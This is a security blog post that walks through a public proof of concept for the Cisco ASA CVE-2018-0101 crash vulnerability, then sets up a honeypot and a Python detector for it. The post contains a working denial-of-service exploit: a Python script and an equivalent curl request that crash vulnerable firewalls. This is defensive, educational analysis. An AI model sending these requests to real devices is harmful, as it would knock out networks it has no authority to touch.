Summary

On 29 January 2018, CVE-2018-0101, a remote code execution and denial of service vulnerability in the Cisco ASA web VPN, was published with a CVSS base score of 10.

For those unfamiliar, the Common Vulnerability Scoring System (CVSS) is a standard for rating the severity of vulnerabilities. Scores range from 0 to 10, with 10 being the most severe.

Proof of concept

On 02 February 2018 @saidelike gave a talk titled “Robin Hood vs Cisco ASA Anyconnect” at Recon Brussels in which he included some XML on slide 19.

Slide 19 from Robin Hood vs Cisco ASA Anyconnect

On 5 February 2018 a proof of concept was published by @zerosum0x0, @jennamagius, and @aleph__naught on pastebin. At first glance it appears to be a Python script that sends a request to the server using the XML found earlier in the slides, along with some other required headers.

#
# Cisco ASA CVE-2018-0101 Crash PoC
#
# We basically just read @saidelike slides:
# https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf
#
# @zerosum0x0, @jennamagius, @aleph___naught
#

import requests, sys

headers = {}
headers['User-Agent'] = 'Open AnyConnect VPN Agent v7.08-265-gae481214-dirty'
headers['Content-Type'] = 'application/x-www-form-urlencoded'
headers['X-Aggregate-Auth'] = '1'
headers['X-Transcend-Version'] = '1'
headers['Accept-Encoding'] = 'identity'
headers['Accept'] = '*/*'
headers['X-AnyConnect-Platform'] = 'linux-64'
headers['X-Support-HTTP-Auth'] = 'false'
headers['X-Pad'] = '0000000000000000000000000000000000000000'

xml = """<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="a" type="a" aggregate-auth-version="a">
    <host-scan-reply>A</host-scan-reply>
</config-auth>
"""

r = requests.post(sys.argv[1], data = xml, headers = headers, verify=False, allow_redirects=False)

print(r.status_code)
print(r.headers)
print(r.text)

So let’s go ahead and test it out!

wget https://pastebin.com/raw/YrBcG2Ln -O poc-cve-2018-0101.py
python3 poc-cve-2018-0101.py https://ciscoasa.glitchwitch.io

Running the PoC produces the following request, which confirms my first-glance reading above.

POST / HTTP/1.1
Host: ciscoasa.glitchwitch.io
User-Agent: Open AnyConnect VPN Agent v7.08-265-gae481214-dirty
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Aggregate-Auth: 1
X-Transcend-Version: 1
X-AnyConnect-Platform: linux-64
X-Support-HTTP-Auth: false
X-Pad: 0000000000000000000000000000000000000000
Content-Length: 156

<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="a" type="a" aggregate-auth-version="a">
    <host-scan-reply>A</host-scan-reply>
</config-auth>

With this in mind, the same request can be made using curl.

curl -i -s -k  -X $'POST' \
    -H $'Host: ciscoasa.glitchwitch.io' -H $'User-Agent: Open AnyConnect VPN Agent v7.08-265-gae481214-dirty' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: */*' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'X-Aggregate-Auth: 1' -H $'X-Transcend-Version: 1' -H $'X-AnyConnect-Platform: linux-64' -H $'X-Support-HTTP-Auth: false' -H $'X-Pad: 0000000000000000000000000000000000000000' -H $'Content-Length: 156' \
    --data-binary $'<?xml version=\"1.0\" encoding=\"UTF-8\"?>\x0a<config-auth client=\"a\" type=\"a\" aggregate-auth-version=\"a\">\x0a    <host-scan-reply>A</host-scan-reply>\x0a</config-auth>\x0a' \
    $'https://ciscoasa.glitchwitch.io/'

Ultimately, if the server is vulnerable, this request should cause the system to crash. In tests on Cisco ASA 9.2(4), this was the case.

Honey Pot

Okay, so we’ve got a working PoC as both a Python script and a curl request. Now let’s set up a honeypot!

On 08 February 2018 @omercent from Cymmetria released a honeypot tool for detecting attempts to exploit this vulnerability. So let’s go ahead and get that set up.

git clone https://github.com/Cymmetria/ciscoasa_honeypot.git
cd ciscoasa_honeypot
pip3 install --upgrade -r requirements.txt

Once that’s done we can start it up.

python3 asa_server.py --help
Usage: asa_server.py [OPTIONS]

  A low interaction honeypot for the Cisco ASA component capable of
  detecting CVE-2018-0101, a DoS and remote code execution vulnerability

Options:
  -h, --host TEXT         Host to listen
  -p, --port INTEGER      Port to listen
  -i, --ike-port INTEGER  Port to listen for IKE
  -s, --enable_ssl        Enable SSL
  -c, --cert TEXT         Certificate File Path (will generate self signed
                          cert if not supplied)
  -v, --verbose           Verbose logging
  --help                  Show this message and exit.

python3 asa_server.py -p 443 -s

Now if we run the PoC against our honeypot we should see the following:

CRITICAL:root:{'data': ['A'], 'src': '10.0.0.32', 'spt': 41392}
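The honeypot's log line above is exactly the information a defender wants from the captured request shown earlier: the source address and port, plus the contents of the host-scan-reply element that the PoC sends. As an added example (not code from the original post and not part of the Cymmetria honeypot), the following script parses a raw HTTP request, checks for the aggregate-auth header the PoC relies on, extracts every host-scan-reply value from the config-auth body, and emits an event dict in the same shape as the honeypot's CRITICAL line. The sample request is constructed from the capture in this post; the detect_cve_2018_0101, parse_http_request and host_scan_reply_values names and the src/spt parameters are my own assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the request the PoC sends, as captured earlier in the post
# (only the headers relevant to detection are kept).
SAMPLE_REQUEST = (
    "POST / HTTP/1.1\r\n"
    "Host: ciscoasa.glitchwitch.io\r\n"
    "User-Agent: Open AnyConnect VPN Agent v7.08-265-gae481214-dirty\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "X-Aggregate-Auth: 1\r\n"
    "X-Transcend-Version: 1\r\n"
    "Content-Length: 156\r\n"
    "\r\n"
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<config-auth client="a" type="a" aggregate-auth-version="a">\n'
    "    <host-scan-reply>A</host-scan-reply>\n"
    "</config-auth>\n"
)


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body).

    Header names are lower-cased so that lookups are case-insensitive,
    matching how HTTP treats them.
    """
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:  # tolerate bare-LF captures
        head, sep, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def host_scan_reply_values(body):
    """Return the text of every <host-scan-reply> element inside a
    <config-auth> body, or [] if the body is not that kind of XML."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return []
    if root.tag != "config-auth":
        return []
    return [(el.text or "") for el in root.iter("host-scan-reply")]


def detect_cve_2018_0101(raw, src="0.0.0.0", spt=0):
    """Return an event dict (same shape as the honeypot's log line) when the
    request matches the aggregate-auth + host-scan-reply pattern, else None.

    src/spt are the connection's source address and port, supplied by the
    caller (hypothetical parameters for this example).
    """
    method, _path, headers, body = parse_http_request(raw)
    if method != "POST":
        return None
    # The PoC announces an AnyConnect aggregate-auth exchange with this header.
    if headers.get("x-aggregate-auth") != "1":
        return None
    data = host_scan_reply_values(body)
    if not data:
        return None
    return {"data": data, "src": src, "spt": spt}


if __name__ == "__main__":
    # Prints: {'data': ['A'], 'src': '10.0.0.32', 'spt': 41392}
    print(detect_cve_2018_0101(SAMPLE_REQUEST, src="10.0.0.32", spt=41392))
```

The detector keys on the combination of a POST, the X-Aggregate-Auth header and a host-scan-reply element rather than on any single header, so ordinary AnyConnect traffic that lacks a host-scan-reply is not flagged. Because the XML is parsed properly instead of string-matched, a request carrying several host-scan-reply values is reported with all of them, which is why the event's data field is a list just as in the honeypot output.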

Conclusion

CVE-2018-0101 is a critical flaw and is more than just a DoS vulnerability: it also allows remote, unauthenticated attackers to achieve remote code execution. At the time of writing, however, no public PoC code exists that demonstrates the RCE portion.

A big thanks to @saidelike, @zerosum0x0, @jennamagius, @aleph__naught, and @omercent for all of their work.